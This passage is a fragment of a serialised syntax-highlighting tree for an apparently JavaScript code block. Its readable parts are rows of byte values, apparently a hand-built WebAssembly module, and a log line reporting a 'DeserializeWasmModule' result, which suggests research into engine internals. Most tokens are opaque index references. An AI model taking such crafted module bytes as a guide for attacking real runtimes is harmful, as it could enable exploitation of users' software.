ps":140699,"children":140700},{"style":5626},[140701],{"type":32,"value":1817},{"type":26,"tag":137,"props":140703,"children":140704},{"style":5601},[140705],{"type":32,"value":1108},{"type":26,"tag":137,"props":140707,"children":140708},{"style":5626},[140709],{"type":32,"value":137160},{"type":26,"tag":137,"props":140711,"children":140712},{"style":5601},[140713],{"type":32,"value":1108},{"type":26,"tag":137,"props":140715,"children":140716},{"style":5626},[140717],{"type":32,"value":1817},{"type":26,"tag":137,"props":140719,"children":140720},{"style":5601},[140721],{"type":32,"value":1108},{"type":26,"tag":137,"props":140723,"children":140724},{"style":5626},[140725],{"type":32,"value":1817},{"type":26,"tag":137,"props":140727,"children":140728},{"style":5601},[140729],{"type":32,"value":1108},{"type":26,"tag":137,"props":140731,"children":140732},{"style":5626},[140733],{"type":32,"value":1817},{"type":26,"tag":137,"props":140735,"children":140736},{"style":5601},[140737],{"type":32,"value":1108},{"type":26,"tag":137,"props":140739,"children":140740},{"style":5626},[140741],{"type":32,"value":47727},{"type":26,"tag":137,"props":140743,"children":140744},{"style":5601},[140745],{"type":32,"value":1108},{"type":26,"tag":137,"props":140747,"children":140748},{"style":5626},[140749],{"type":32,"value":1817},{"type":26,"tag":137,"props":140751,"children":140752},{"style":5601},[140753],{"type":32,"value":1108},{"type":26,"tag":137,"props":140755,"children":140756},{"style":5626},[140757],{"type":32,"value":1817},{"type":26,"tag":137,"props":140759,"children":140760},{"style":5601},[140761],{"type":32,"value":1108},{"type":26,"tag":137,"props":140763,"children":140764},{"style":5626},[140765],{"type":32,"value":1817},{"type":26,"tag":137,"props":140767,"children":140768},{"style":5601},[140769],{"type":32,"value":1108},{"type":26,"tag":137,"props":140771,"children":140772},{"style":5626},[140773],{"type":32,"value":47727},{"type":26,"tag":137,"props":140775,"children":140776},{"style":5601},[140777],{"type":32,"value":1108},{"type":26,"tag":137,"props":140779,"children":140780},{"style":5626},[140781],{"type":32,"value":1817},{"type":26,"tag":137,"props":140783,"children":140784},{"style":5601},[140785],{"type":32,"value":6099},{"type":26,"tag":137,"props":140787,"children":140788},{"class":5559,"line":5909},[140789,140793,140797,140801,140805,140809,140813,140817,140821,140825,140829,140833,140837,140841,140845,140849,140853,140857,140861,140865,140869,140873,140877,140881,140885,140889,140893,140897,140901,140905,140909,140913,140917,140921,140925,140929,140933,140937,140941,140945,140949,140953,140957,140961,140965,140969,140973,140977,140981,140985,140989,140993,140997,141001,141005,141009,141013,141017,141021,141025,141029,141033],{"type":26,"tag":137,"props":140790,"children":140791},{"style":5626},[140792],{"type":32,"value":136785},{"type":26,"tag":137,"props":140794,"children":140795},{"style":5601},[140796],{"type":32,"value":1108},{"type":26,"tag":137,"props":140798,"children":140799},{"style":5626},[140800],{"type":32,"value":1817},{"type":26,"tag":137,"props":140802,"children":140803},{"style":5601},[140804],{"type":32,"value":1108},{"type":26,"tag":137,"props":140806,"children":140807},{"style":5626},[140808],{"type":32,"value":47727},{"type":26,"tag":137,"props":140810,"children":140811},{"style":5601},[140812],{"type":32,"value":1108},{"type":26,"tag":137,"props":140814,"children":140815},{"style":5626},[140816],{"type":32,"value":1817},{"type":26,"tag":137,"props":140818,"children":140819},{"style":5601},[140820],{"type":32,"value":1108},{"type":26,"tag":137,"props":140822,"children":140823},{"style":5626},[140824],{"type":32,"value":1817},{"type":26,"tag":137,"props":140826,"children":140827},{"style":5601},[140828],{"type":32,"value":1108},{"type":26,"tag":137,"props":140830,"children":140831},{"style":5626},[140832],{"type":32,"value":1817},{"type":26,"tag":137,"props":140834,"children":140835},{"style":5601},[140836],{"type":32,"value":1108},{"type":26,"tag":137,"props":140838,"children":140839},{"style":5626},[140840],{"type":32,"value":3235},{"type":26,"tag":137,"props":140842,"children":140843},{"style":5601},[140844],{"type":32,"value":1108},{"type":26,"tag":137,"props":140846,"children":140847},{"style":5626},[140848],{"type":32,"value":1817},{"type":26,"tag":137,"props":140850,"children":140851},{"style":5601},[140852],{"type":32,"value":1108},{"type":26,"tag":137,"props":140854,"children":140855},{"style":5626},[140856],{"type":32,"value":1817},{"type":26,"tag":137,"props":140858,"children":140859},{"style":5601},[140860],{"type":32,"value":1108},{"type":26,"tag":137,"props":140862,"children":140863},{"style":5626},[140864],{"type":32,"value":1817},{"type":26,"tag":137,"props":140866,"children":140867},{"style":5601},[140868],{"type":32,"value":1108},{"type":26,"tag":137,"props":140870,"children":140871},{"style":5626},[140872],{"type":32,"value":1817},{"type":26,"tag":137,"props":140874,"children":140875},{"style":5601},[140876],{"type":32,"value":1108},{"type":26,"tag":137,"props":140878,"children":140879},{"style":5626},[140880],{"type":32,"value":1817},{"type":26,"tag":137,"props":140882,"children":140883},{"style":5601},[140884],{"type":32,"value":1108},{"type":26,"tag":137,"props":140886,"children":140887},{"style":5626},[140888],{"type":32,"value":1817},{"type":26,"tag":137,"props":140890,"children":140891},{"style":5601},[140892],{"type":32,"value":1108},{"type":26,"tag":137,"props":140894,"children":140895},{"style":5626},[140896],{"type":32,"value":1817},{"type":26,"tag":137,"props":140898,"children":140899},{"style":5601},[140900],{"type":32,"value":1108},{"type":26,"tag":137,"props":140902,"children":140903},{"style":5626},[140904],{"type":32,"value":1817},{"type":26,"tag":137,"props":140906,"children":140907},{"style":5601},[140908],{"type":32,"value":1108},{"type":26,"tag":137,"props":140910,"children":140911},{"style":5626},[140912],{"type":32,"value":1817},{"type":26,"tag":137,"props":140914,"children":140915},{"style":5601},[140916],{"type":32,"value":1108},{"type":26,"tag":137,"props":140918,"children":140919},{"style":5626},[140920],{"type":32,"value":1817},{"type":26,"tag":137,"props":140922,"children":140923},{"style":5601},[140924],{"type":32,"value":1108},{"type":26,"tag":137,"props":140926,"children":140927},{"style":5626},[140928],{"type":32,"value":1817},{"type":26,"tag":137,"props":140930,"children":140931},{"style":5601},[140932],{"type":32,"value":1108},{"type":26,"tag":137,"props":140934,"children":140935},{"style":5626},[140936],{"type":32,"value":3957},{"type":26,"tag":137,"props":140938,"children":140939},{"style":5601},[140940],{"type":32,"value":1108},{"type":26,"tag":137,"props":140942,"children":140943},{"style":5626},[140944],{"type":32,"value":1817},{"type":26,"tag":137,"props":140946,"children":140947},{"style":5601},[140948],{"type":32,"value":1108},{"type":26,"tag":137,"props":140950,"children":140951},{"style":5626},[140952],{"type":32,"value":1817},{"type":26,"tag":137,"props":140954,"children":140955},{"style":5601},[140956],{"type":32,"value":1108},{"type":26,"tag":137,"props":140958,"children":140959},{"style":5626},[140960],{"type":32,"value":1817},{"type":26,"tag":137,"props":140962,"children":140963},{"style":5601},[140964],{"type":32,"value":1108},{"type":26,"tag":137,"props":140966,"children":140967},{"style":5626},[140968],{"type":32,"value":1817},{"type":26,"tag":137,"props":140970,"children":140971},{"style":5601},[140972],{"type":32,"value":1108},{"type":26,"tag":137,"props":140974,"children":140975},{"style":5626},[140976],{"type":32,"value":1817},{"type":26,"tag":137,"props":140978,"children":140979},{"style":5601},[140980],{"type":32,"value":1108},{"type":26,"tag":137,"props":140982,"children":140983},{"style":5626},[140984],{"type":32,"value":1817},{"type":26,"tag":137,"props":140986,"children":140987},{"style":5601},[140988],{"type":32,"value":1108},{"type":26,"tag":137,"props":140990,"children":140991},{"style":5626},[140992],{"type":32,"value":1817},{"type":26,"tag":137,"props":140994,"children":140995},{"style":5601},[140996],{"type":32,"value":1108},{"type":26,"tag":137,"props":140998,"children":140999},{"style":5626},[141000],{"type":32,"value":1817},{"type":26,"tag":137,"props":141002,"children":141003},{"style":5601},[141004],{"type":32,"value":1108},{"type":26,"tag":137,"props":141006,"children":141007},{"style":5626},[141008],{"type":32,"value":1817},{"type":26,"tag":137,"props":141010,"children":141011},{"style":5601},[141012],{"type":32,"value":1108},{"type":26,"tag":137,"props":141014,"children":141015},{"style":5626},[141016],{"type":32,"value":1817},{"type":26,"tag":137,"props":141018,"children":141019},{"style":5601},[141020],{"type":32,"value":1108},{"type":26,"tag":137,"props":141022,"children":141023},{"style":5626},[141024],{"type":32,"value":1817},{"type":26,"tag":137,"props":141026,"children":141027},{"style":5601},[141028],{"type":32,"value":1108},{"type":26,"tag":137,"props":141030,"children":141031},{"style":5626},[141032],{"type":32,"value":1817},{"type":26,"tag":137,"props":141034,"children":141035},{"style":5601},[141036],{"type":32,"value":6099},{"type":26,"tag":137,"props":141038,"children":141039},{"class":5559,"line":5930},[141040,141044,141048,141052,141056,141060,141064,141068,141072,141076,141080,141084,141088,141092,141096,141100,141104,141108,141112,141116,141120,141124,141128,141132,141136,141140,141144,141148,141152,141156,141160,141164,141168,141173,141177,141182,141186,141190,141194,141199,141203,141207,141211,141215,141219,141223,141227,141232,141236,141240,141244,141249,141253,141257],{"type":26,"tag":137,"props":141041,"children":141042},{"style":5626},[141043],{"type":32,"value":136785},{"type":26,"tag":137,"props":141045,"children":141046},{"style":5601},[141047],{"type":32,"value":1108},{"type":26,"tag":137,"props":141049,"children":141050},{"style":5626},[141051],{"type":32,"value":1817},{"type":26,"tag":137,"props":141053,"children":141054},{"style":5601},[141055],{"type":32,"value":1108},{"type":26,"tag":137,"props":141057,"children":141058},{"style":5626},[141059],{"type":32,"value":1817},{"type":26,"tag":137,"props":141061,"children":141062},{"style":5601},[141063],{"type":32,"value":1108},{"type":26,"tag":137,"props":141065,"children":141066},{"style":5626},[141067],{"type":32,"value":1817},{"type":26,"tag":137,"props":141069,"children":141070},{"style":5601},[141071],{"type":32,"value":1108},{"type":26,"tag":137,"props":141073,"children":141074},{"style":5626},[141075],{"type":32,"value":1817},{"type":26,"tag":137,"props":141077,"children":141078},{"style":5601},[141079],{"type":32,"value":1108},{"type":26,"tag":137,"props":141081,"children":141082},{"style":5626},[141083],{"type":32,"value":1817},{"type":26,"tag":137,"props":141085,"children":141086},{"style":5601},[141087],{"type":32,"value":1108},{"type":26,"tag":137,"props":141089,"children":141090},{"style":5626},[141091],{"type":32,"value":1817},{"type":26,"tag":137,"props":141093,"children":141094},{"style":5601},[141095],{"type":32,"value":1108},{"type":26,"tag":137,"props":141097,"children":141098},{"style":5626},[141099],{"type":32,"value":1817},{"type":26,"tag":137,"props":141101,"children":141102},{"style":5601},[141103],{"type":32,"value":1108},{"type":26,"tag":137,"props":141105,"children":141106},{"style":5626},[141107],{"type":32,"value":1817},{"type":26,"tag":137,"props":141109,"children":141110},{"style":5601},[141111],{"type":32,"value":1108},{"type":26,"tag":137,"props":141113,"children":141114},{"style":5626},[141115],{"type":32,"value":1817},{"type":26,"tag":137,"props":141117,"children":141118},{"style":5601},[141119],{"type":32,"value":1108},{"type":26,"tag":137,"props":141121,"children":141122},{"style":5626},[141123],{"type":32,"value":1817},{"type":26,"tag":137,"props":141125,"children":141126},{"style":5601},[141127],{"type":32,"value":1108},{"type":26,"tag":137,"props":141129,"children":141130},{"style":5626},[141131],{"type":32,"value":1817},{"type":26,"tag":137,"props":141133,"children":141134},{"style":5601},[141135],{"type":32,"value":1108},{"type":26,"tag":137,"props":141137,"children":141138},{"style":5626},[141139],{"type":32,"value":1817},{"type":26,"tag":137,"props":141141,"children":141142},{"style":5601},[141143],{"type":32,"value":1108},{"type":26,"tag":137,"props":141145,"children":141146},{"style":5626},[141147],{"type":32,"value":1817},{"type":26,"tag":137,"props":141149,"children":141150},{"style":5601},[141151],{"type":32,"value":1108},{"type":26,"tag":137,"props":141153,"children":141154},{"style":5626},[141155],{"type":32,"value":1817},{"type":26,"tag":137,"props":141157,"children":141158},{"style":5601},[141159],{"type":32,"value":1108},{"type":26,"tag":137,"props":141161,"children":141162},{"style":5626},[141163],{"type":32,"value":277},{"type":26,"tag":137,"props":141165,"children":141166},{"style":5601},[141167],{"type":32,"value":1108},{"type":26,"tag":137,"props":141169,"children":141170},{"style":5626},[141171],{"type":32,"value":141172},"95",{"type":26,"tag":137,"props":141174,"children":141175},{"style":5601},[141176],{"type":32,"value":1108},{"type":26,"tag":137,"props":141178,"children":141179},{"style":5626},[141180],{"type":32,"value":141181},"36",{"type":26,"tag":137,"props":141183,"children":141184},{"style":5601},[141185],{"type":32,"value":1108},{"type":26,"tag":137,"props":141187,"children":141188},{"style":5626},[141189],{"type":32,"value":344},{"type":26,"tag":137,"props":141191,"children":141192},{"style":5601},[141193],{"type":32,"value":1108},{"type":26,"tag":137,"props":141195,"children":141196},{"style":5626},[141197],{"type":32,"value":141198},"213",{"type":26,"tag":137,"props":141200,"children":141201},{"style":5601},[141202],{"type":32,"value":1108},{"type":26,"tag":137,"props":141204,"children":141205},{"style":5626},[141206],{"type":32,"value":43444},{"type":26,"tag":137,"props":141208,"children":141209},{"style":5601},[141210],{"type":32,"value":1108},{"type":26,"tag":137,"props":141212,"children":141213},{"style":5626},[141214],{"type":32,"value":878},{"type":26,"tag":137,"props":141216,"children":141217},{"style":5601},[141218],{"type":32,"value":1108},{"type":26,"tag":137,"props":141220,"children":141221},{"style":5626},[141222],{"type":32,"value":32441},{"type":26,"tag":137,"props":141224,"children":141225},{"style":5601},[141226],{"type":32,"value":1108},{"type":26,"tag":137,"props":141228,"children":141229},{"style":5626},[141230],{"type":32,"value":141231},"210",{"type":26,"tag":137,"props":141233,"children":141234},{"style":5601},[141235],{"type":32,"value":1108},{"type":26,"tag":137,"props":141237,"children":141238},{"style":5626},[141239],{"type":32,"value":137178},{"type":26,"tag":137,"props":141241,"children":141242},{"style":5601},[141243],{"type":32,"value":1108},{"type":26,"tag":137,"props":141245,"children":141246},{"style":5626},[141247],{"type":32,"value":141248},"35",{"type":26,"tag":137,"props":141250,"children":141251},{"style":5601},[141252],{"type":32,"value":1108},{"type":26,"tag":137,"props":141254,"children":141255},{"style":5626},[141256],{"type":32,"value":344},{"type":26,"tag":137,"props":141258,"children":141259},{"style":5601},[141260],{"type":32,"value":6099},{"type":26,"tag":137,"props":141262,"children":141263},{"class":5559,"line":5939},[141264,141269,141273,141278,141282,141287,141291,141296,141300,141305,141309,141314,141318,141323,141327,141331,141335,141339,141343,141347,141351,141355,141359,141363,141367,141372,141376,141381,141385,141389,141393,141397,141401,141405,141409,141413,141417,141421,141425,141430,141434,141439],{"type":26,"tag":137,"props":141265,"children":141266},{"style":5626},[141267],{"type":32,"value":141268},"    213",{"type":26,"tag":137,"props":141270,"children":141271},{"style":5601},[141272],{"type":32,"value":1108},{"type":26,"tag":137,"props":141274,"children":141275},{"style":5626},[141276],{"type":32,"value":141277},"231",{"type":26,"tag":137,"props":141279,"children":141280},{"style":5601},[141281],{"type":32,"value":1108},{"type":26,"tag":137,"props":141283,"children":141284},{"style":5626},[141285],{"type":32,"value":141286},"67",{"type":26,"tag":137,"props":141288,"children":141289},{"style":5601},[141290],{"type":32,"value":1108},{"type":26,"tag":137,"props":141292,"children":141293},{"style":5626},[141294],{"type":32,"value":141295},"190",{"type":26,"tag":137,"props":141297,"children":141298},{"style":5601},[141299],{"type":32,"value":1108},{"type":26,"tag":137,"props":141301,"children":141302},{"style":5626},[141303],{"type":32,"value":141304},"169",{"type":26,"tag":137,"props":141306,"children":141307},{"style":5601},[141308],{"type":32,"value":1108},{"type":26,"tag":137,"props":141310,"children":141311},{"style":5626},[141312],{"type":32,"value":141313},"253",{"type":26,"tag":137,"props":141315,"children":141316},{"style":5601},[141317],{"type":32,"value":1108},{"type":26,"tag":137,"props":141319,"children":141320},{"style":5626},[141321],{"type":32,"value":141322},"123",{"type":26,"tag":137,"props":141324,"children":141325},{"style":5601},[141326],{"type":32,"value":1108},{"type":26,"tag":137,"props":141328,"children":141329},{"style":5626},[141330],{"type":32,"value":878},{"type":26,"tag":137,"props":141332,"children":141333},{"style":5601},[141334],{"type":32,"value":1108},{"type":26,"tag":137,"props":141336,"children":141337},{"style":5626},[141338],{"type":32,"value":141304},{"type":26,"tag":137,"props":141340,"children":141341},{"style":5601},[141342],{"type":32,"value":1108},{"type":26,"tag":137,"props":141344,"children":141345},{"style":5626},[141346],{"type":32,"value":141313},{"type":26,"tag":137,"props":141348,"children":141349},{"style":5601},[141350],{"type":32,"value":1108},{"type":26,"tag":137,"props":141352,"children":141353},{"style":5626},[141354],{"type":32,"value":141286},{"type":26,"tag":137,"props":141356,"children":141357},{"style":5601},[141358],{"type":32,"value":1108},{"type":26,"tag":137,"props":141360,"children":141361},{"style":5626},[141362],{"type":32,"value":1817},{"type":26,"tag":137,"props":141364,"children":141365},{"style":5601},[141366],{"type":32,"value":1108},{"type":26,"tag":137,"props":141368,"children":141369},{"style":5626},[141370],{"type":32,"value":141371},"145",{"type":26,"tag":137,"props":141373,"children":141374},{"style":5601},[141375],{"type":32,"value":1108},{"type":26,"tag":137,"props":141377,"children":141378},{"style":5626},[141379],{"type":32,"value":141380},"191",{"type":26,"tag":137,"props":141382,"children":141383},{"style":5601},[141384],{"type":32,"value":1108},{"type":26,"tag":137,"props":141386,"children":141387},{"style":5626},[141388],{"type":32,"value":344},{"type":26,"tag":137,"props":141390,"children":141391},{"style":5601},[141392],{"type":32,"value":1108},{"type":26,"tag":137,"props":141394,"children":141395},{"style":5626},[141396],{"type":32,"value":1817},{"type":26,"tag":137,"props":141398,"children":141399},{"style":5601},[141400],{"type":32,"value":1108},{"type":26,"tag":137,"props":141402,"children":141403},{"style":5626},[141404],{"type":32,"value":141371},{"type":26,"tag":137,"props":141406,"children":141407},{"style":5601},[141408],{"type":32,"value":1108},{"type":26,"tag":137,"props":141410,"children":141411},{"style":5626},[141412],{"type":32,"value":141313},{"type":26,"tag":137,"props":141414,"children":141415},{"style":5601},[141416],{"type":32,"value":1108},{"type":26,"tag":137,"props":141418,"children":141419},{"style":5626},[141420],{"type":32,"value":141322},{"type":26,"tag":137,"props":141422,"children":141423},{"style":5601},[141424],{"type":32,"value":1108},{"type":26,"tag":137,"props":141426,"children":141427},{"style":5626},[141428],{"type":32,"value":141429},"193",{"type":26,"tag":137,"props":141431,"children":141432},{"style":5601},[141433],{"type":32,"value":1108},{"type":26,"tag":137,"props":141435,"children":141436},{"style":5626},[141437],{"type":32,"value":141438},"168",{"type":26,"tag":137,"props":141440,"children":141441},{"style":5601},[141442],{"type":32,"value":6099},{"type":26,"tag":137,"props":141444,"children":141445},{"class":5559,"line":6191},[141446,141451,141455,141459,141463,141467,141471,141475,141479,141483,141487,141491,141495,141499,141503,141508,141512,141516,141520,141524,141528,141532,141536,141540,141544,141548,141552,141556,141560,141564,141568,141572,141576,141580,141584,141588,141592,141596,141600,141604,141608,141612,141616,141620,141624,141628,141632,141636,141640,141644,141648,141652,141656,141660],{"type":26,"tag":137,"props":141447,"children":141448},{"style":5626},[141449],{"type":32,"value":141450},"    255",{"type":26,"tag":137,"props":141452,"children":141453},{"style":5601},[141454],{"type":32,"value":1108},{"type":26,"tag":137,"props":141456,"children":141457},{"style":5626},[141458],{"type":32,"value":141248},{"type":26,"tag":137,"props":141460,"children":141461},{"style":5601},[141462],{"type":32,"value":1108},{"type":26,"tag":137,"props":141464,"children":141465},{"style":5626},[141466],{"type":32,"value":344},{"type":26,"tag":137,"props":141468,"children":141469},{"style":5601},[141470],{"type":32,"value":1108},{"type":26,"tag":137,"props":141472,"children":141473},{"style":5626},[141474],{"type":32,"value":141198},{"type":26,"tag":137,"props":141476,"children":141477},{"style":5601},[141478],{"type":32,"value":1108},{"type":26,"tag":137,"props":141480,"children":141481},{"style":5626},[141482],{"type":32,"value":137133},{"type":26,"tag":137,"props":141484,"children":141485},{"style":5601},[141486],{"type":32,"value":1108},{"type":26,"tag":137,"props":141488,"children":141489},{"style":5626},[141490],{"type":32,"value":344},{"type":26,"tag":137,"props":141492,"children":141493},{"style":5601},[141494],{"type":32,"value":1108},{"type":26,"tag":137,"props":141496,"children":141497},{"style":5626},[141498],{"type":32,"value":141172},{"type":26,"tag":137,"props":141500,"children":141501},{"style":5601},[141502],{"type":32,"value":1108},{"type":26,"tag":137,"props":141504,"children":141505},{"style":5626},[141506],{"type":32,"value":141507},"214",{"type":26,"tag":137,"props":141509,"children":141510},{"style":5601},[141511],{"type":32,"value":1108},{"type":26,"tag":137,"props":141513,"children":141514},{"style":5626},[141515],{"type":32,"value":99249},{"type":26,"tag":137,"props":141517,"children":141518},{"style":5601},[141519],{"type":32,"value":1108},{"type":26,"tag":137,"props":141521,"children":141522},{"style":5626},[141523],{"type":32,"value":62948},{"type":26,"tag":137,"props":141525,"children":141526},{"style":5601},[141527],{"type":32,"value":1108},{"type":26,"tag":137,"props":141529,"children":141530},{"style":5626},[141531],{"type":32,"value":344},{"type":26,"tag":137,"props":141533,"children":141534},{"style":5601},[141535],{"type":32,"value":1108},{"type":26,"tag":137,"props":141537,"children":141538},{"style":5626},[141539],{"type":32,"value":141198},{"type":26,"tag":137,"props":141541,"children":141542},{"style":5601},[141543],{"type":32,"value":1108},{"type":26,"tag":137,"props":141545,"children":141546},{"style":5626},[141547],{"type":32,"value":3235},{"type":26,"tag":137,"props":141549,"children":141550},{"style":5601},[141551],{"type":32,"value":1108},{"type":26,"tag":137,"props":141553,"children":141554},{"style":5626},[141555],{"type":32,"value":1817},{"type":26,"tag":137,"props":141557,"children":141558},{"style":5601},[141559],{"type":32,"value":1108},{"type":26,"tag":137,"props":141561,"children":141562},{"style":5626},[141563],{"type":32,"value":1817},{"type":26,"tag":137,"props":141565,"children":141566},{"style":5601},[141567],{"type":32,"value":1108},{"type":26,"tag":137,"props":141569,"children":141570},{"style":5626},[141571],{"type":32,"value":1817},{"type":26,"tag":137,"props":141573,"children":141574},{"style":5601},[141575],{"type":32,"value":1108},{"type":26,"tag":137,"props":141577,"children":141578},{"style":5626},[141579],{"type":32,"value":1817},{"type":26,"tag":137,"props":141581,"children":141582},{"style":5601},[141583],{"type":32,"value":1108},{"type":26,"tag":137,"props":141585,"children":141586},{"style":5626},[141587],{"type":32,"value":1817},{"type":26,"tag":137,"props":141589,"children":141590},{"style":5601},[141591],{"type":32,"value":1108},{"type":26,"tag":137,"props":141593,"children":141594},{"style":5626},[141595],{"type":32,"value":1817},{"type":26,"tag":137,"props":141597,"children":141598},{"style":5601},[141599],{"type":32,"value":1108},{"type":26,"tag":137,"props":141601,"children":141602},{"style":5626},[141603],{"type":32,"value":1817},{"type":26,"tag":137,"props":141605,"children":141606},{"style":5601},[141607],{"type":32,"value":1108},{"type":26,"tag":137,"props":141609,"children":141610},{"style":5626},[141611],{"type":32,"value":1817},{"type":26,"tag":137,"props":141613,"children":141614},{"style":5601},[141615],{"type":32,"value":1108},{"type":26,"tag":137,"props":141617,"children":141618},{"style":5626},[141619],{"type":32,"value":3235},{"type":26,"tag":137,"props":141621,"children":141622},{"style":5601},[141623],{"type":32,"value":1108},{"type":26,"tag":137,"props":141625,"children":141626},{"style":5626},[141627],{"type":32,"value":1817},{"type":26,"tag":137,"props":141629,"children":141630},{"style":5601},[141631],{"type":32,"value":1108},{"type":26,"tag":137,"props":141633,"children":141634},{"style":5626},[141635],{"type":32,"value":1817},{"type":26,"tag":137,"props":141637,"children":141638},{"style":5601},[141639],{"type":32,"value":1108},{"type":26,"tag":137,"props":141641,"children":141642},{"style":5626},[141643],{"type":32,"value":1817},{"type":26,"tag":137,"props":141645,"children":141646},{"style":5601},[141647],{"type":32,"value":1108},{"type":26,"tag":137,"props":141649,"children":141650},{"style":5626},[141651],{"type":32,"value":1817},{"type":26,"tag":137,"props":141653,"children":141654},{"style":5601},[141655],{"type":32,"value":1108},{"type":26,"tag":137,"props":141657,"children":141658},{"style":5626},[141659],{"type":32,"value":1817},{"type":26,"tag":137,"props":141661,"children":141662},{"style":5601},[141663],{"type":32,"value":6099},{"type":26,"tag":137,"props":141665,"children":141666},{"class":5559,"line":6208},[141667,141671,141675,141679,141683,141687,141691,141695,141699,141703,141707,141712,141716,141721,141725,141730,141734,141738],{"type":26,"tag":137,"props":141668,"children":141669},{"style":5626},[141670],{"type":32,"value":136785},{"type":26,"tag":137,"props":141672,"children":141673},{"style":5601},[141674],{"type":32,"value":1108},{"type":26,"tag":137,"props":141676,"children":141677},{"style":5626},[141678],{"type":32,"value":1817},{"type":26,"tag":137,"props":141680,"children":141681},{"style":5601},[141682],{"type":32,"value":1108},{"type":26,"tag":137,"props":141684,"children":141685},{"style":5626},[141686],{"type":32,"value":1817},{"type":26,"tag":137,"props":141688,"children":141689},{"style":5601},[141690],{"type":32,"value":1108},{"type":26,"tag":137,"props":141692,"children":141693},{"style":5626},[141694],{"type":32,"value":1817},{"type":26,"tag":137,"props":141696,"children":141697},{"style":5601},[141698],{"type":32,"value":1108},{"type":26,"tag":137,"props":141700,"children":141701},{"style":5626},[141702],{"type":32,"value":1817},{"type":26,"tag":137,"props":141704,"children":141705},{"style":5601},[141706],{"type":32,"value":1108},{"type":26,"tag":137,"props":141708,"children":141709},{"style":5626},[141710],{"type":32,"value":141711},"92",{"type":26,"tag":137,"props":141713,"children":141714},{"style":5601},[141715],{"type":32,"value":1108},{"type":26,"tag":137,"props":141717,"children":141718},{"style":5626},[141719],{"type":32,"value":141720},"50",{"type":26,"tag":137,"props":141722,"children":141723},{"style":5601},[141724],{"type":32,"value":1108},{"type":26,"tag":137,"props":141726,"children":141727},{"style":5626},[141728],{"type":32,"value":141729},"162",{"type":26,"tag":137,"props":141731,"children":141732},{"style":5601},[141733],{"type":32,"value":1108},{"type":26,"tag":137,"props":141735,"children":141736},{"style":5626},[141737],{"type":32,"value":1817},{"type":26,"tag":137,"props":141739,"children":141740},{"style":5601},[141741],{"type":32,"value":6099},{"type":26,"tag":137,"props":141743,"children":141744},{"class":5559,"line":6225},[141745],{"type":26,"tag":137,"props":141746,"children":141747},{"style":5601},[141748],{"type":32,"value":137072},{"type":26,"tag":137,"props":141750,"children":141751},{"class":5559,"line":6238},[141752,141756,141760,141764,141768,141772,141776,141780,141784,141788,141792],{"type":26,"tag":137,"props":141753,"children":141754},{"style":5573},[141755],{"type":32,"value":10440},{"type":26,"tag":137,"props":141757,"children":141758},{"style":5584},[141759],{"type":32,"value":138525},{"type":26,"tag":137,"props":141761,"children":141762},{"style":5590},[141763],{"type":32,"value":5593},{"type":26,"tag":137,"props":141765,"children":141766},{"style":5682},[141767],{"type":32,"value":138534},{"type":26,"tag":137,"props":141769,"children":141770},{"style":5601},[141771],{"type":32,"value":165},{"type":26,"tag":137,"props":141773,"children":141774},{"style":5584},[141775],{"type":32,"value":136403},{"type":26,"tag":137,"props":141777,"children":141778},{"style":5601},[141779],{"type":32,"value":1108},{"type":26,"tag":137,"props":141781,"children":141782},{"style":5584},[141783],{"type":32,"value":127693},{"type":26,"tag":137,"props":141785,"children":141786},{"style":5601},[141787],{"type":32,"value":470},{"type":26,"tag":137,"props":141789,"children":141790},{"style":5584},[141791],{"type":32,"value":127693},{"type":26,"tag":137,"props":141793,"children":141794},{"style":5601},[141795],{"type":32,"value":6430},{"type":26,"tag":137,"props":141797,"children":141798},{"class":5559,"line":6247},[141799,141803,141807,141811,141815,141819,141823,141827,141831,141835],{"type":26,"tag":137,"props":141800,"children":141801},{"style":5584},[141802],{"type":32,"value":138570},{"type":26,"tag":137,"props":141804,"children":141805},{"style":5590},[141806],{"type":32,"value":5593},{"type":26,"tag":137,"props":141808,"children":141809},{"style":5601},[141810],{"type":32,"value":4625},{"type":26,"tag":137,"props":141812,"children":141813},{"style":5610},[141814],{"type":32,"value":35512},{"type":26,"tag":137,"props":141816,"children":141817},{"style":5584},[141818],{"type":32,"value":138525},{"type":26,"tag":137,"props":141820,"children":141821},{"style":5601},[141822],{"type":32,"value":470},{"type":26,"tag":137,"props":141824,"children":141825},{"style":5682},[141826],{"type":32,"value":60166},{"type":26,"tag":137,"props":141828,"children":141829},{"style":5601},[141830],{"type":32,"value":138599},{"type":26,"tag":137,"props":141832,"children":141833},{"style":5584},[141834],{"type":32,"value":41748},{"type":26,"tag":137,"props":141836,"children":141837},{"style":5601},[141838],{"type":32,"value":5604},{"type":26,"tag":137,"props":141840,"children":141841},{"class":5559,"line":6270},[141842,141846,141850,141854,141858,141863,141867,141871],{"type":26,"tag":137,"props":141843,"children":141844},{"style":5584},[141845],{"type":32,"value":104525},{"type":26,"tag":137,"props":141847,"children":141848},{"style":5601},[141849],{"type":32,"value":470},{"type":26,"tag":137,"props":141851,"children":141852},{"style":5682},[141853],{"type":32,"value":104534},{"type":26,"tag":137,"props":141855,"children":141856},{"style":5601},[141857],{"type":32,"value":165},{"type":26,"tag":137,"props":141859,"children":141860},{"style":6837},[141861],{"type":32,"value":141862},"'DeserializeWasmModule result: '",{"type":26,"tag":137,"props":141864,"children":141865},{"style":5590},[141866],{"type":32,"value":11491},{"type":26,"tag":137,"props":141868,"children":141869},{"style":5584},[141870],{"type":32,"value":11748},{"type":26,"tag":137,"props":141872,"children":141873},{"style":5601},[141874],{"type":32,"value":6430},{"type":26,"tag":137,"props":141876,"children":141877},{"class":5559,"line":6279},[141878,141882,141886,141890,141894,141898,141902,141906,141910,141914],{"type":26,"tag":137,"props":141879,"children":141880},{"style":5573},[141881],{"type":32,"value":38784},{"type":26,"tag":137,"props":141883,"children":141884},{"style":5584},[141885],{"type":32,"value":138619},{"type":26,"tag":137,"props":141887,"children":141888},{"style":5590},[141889],{"type":32,"value":5593},{"type":26,"tag":137,"props":141891,"children":141892},{"style":5573},[141893],{"type":32,"value":34528},{"type":26,"tag":137,"props":141895,"children":141896},{"style":5584},[141897],{"type":32,"value":136386},{"type":26,"tag":137,"props":141899,"children":141900},{"style":5601},[141901],{"type":32,"value":470},{"type":26,"tag":137,"props":141903,"children":141904},{"style":5682},[141905],{"type":32,"value":136440},{"type":26,"tag":137,"props":141907,"children":141908},{"style":5601},[141909],{"type":32,"value":165},{"type":26,"tag":137,"props":141911,"children":141912},{"style":5584},[141913],{"type":32,"value":11670},{"type":26,"tag":137,"props":141915,"children":141916},{"style":5601},[141917],{"type":32,"value":6430},{"type":26,"tag":137,"props":141919,"children":141920},{"class":5559,"line